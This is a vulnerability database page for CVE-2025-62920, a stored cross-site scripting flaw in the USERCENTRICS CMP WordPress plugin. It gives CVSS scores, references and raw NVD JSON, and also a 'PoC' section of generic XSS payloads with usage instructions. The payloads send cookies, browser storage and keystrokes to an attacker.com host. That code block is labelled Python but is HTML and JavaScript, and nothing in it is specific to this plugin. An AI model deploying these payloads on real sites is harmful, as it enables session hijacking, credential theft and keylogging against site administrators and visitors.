CVE-2025-62920

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webnique USERCENTRICS CMP usercentrics-consent-management-platform allows Stored XSS.This issue affects USERCENTRICS CMP: from n/a through <= 1.0.9.

CVSS Details

CVSS Score

5.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

USERCENTRICS CMP WordPress插件 <= 1.0.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-62920 Stored XSS PoC for USERCENTRICS CMP WordPress Plugin -->
<!-- Payload: Inject malicious JavaScript via plugin's consent management feature -->

<!-- Method 1: Direct injection via plugin settings -->
<script>alert(document.cookie)</script>

<!-- Method 2: More sophisticated payload for cookie stealing -->
<script>
  var img = document.createElement('img');
  img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie);
  document.body.appendChild(img);
</script>

<!-- Method 3: Session hijacking payload -->
<script>
  fetch('https://attacker.com/steal', {
    method: 'POST',
    mode: 'no-cors',
    body: JSON.stringify({
      cookies: document.cookie,
      localStorage: localStorage,
      sessionStorage: sessionStorage
    })
  });
</script>

<!-- Method 4: Keylogger payload -->
<script>
  document.addEventListener('keypress', function(e) {
    new Image().src = 'https://attacker.com/log?key=' + e.key;
  });
</script>

<!-- Usage Instructions:
1. Identify the input field in USERCENTRICS CMP plugin (<= 1.0.9)
2. Inject one of the above payloads into the consent management settings
3. Wait for admin or other users to visit the affected page
4. Payload will execute in their browser context
5. Attacker receives stolen credentials/session data
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62920
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62920
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62920/
[4] VulDB https://vuldb.com/cve/CVE-2025-62920
[5] https://patchstack.com/database/Wordpress/Plugin/usercentrics-consent-management-platform/vulnerability/wordpress-usercentrics-cmp-plugin-1-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62920", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:51.580", "lastModified": "2026-04-27T18:16:31.007", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in webnique USERCENTRICS CMP usercentrics-consent-management-platform allows Stored XSS.This issue affects USERCENTRICS CMP: from n/a through <= 1.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.7, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/usercentrics-consent-management-platform/vulnerability/wordpress-usercentrics-cmp-plugin-1-0-9-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}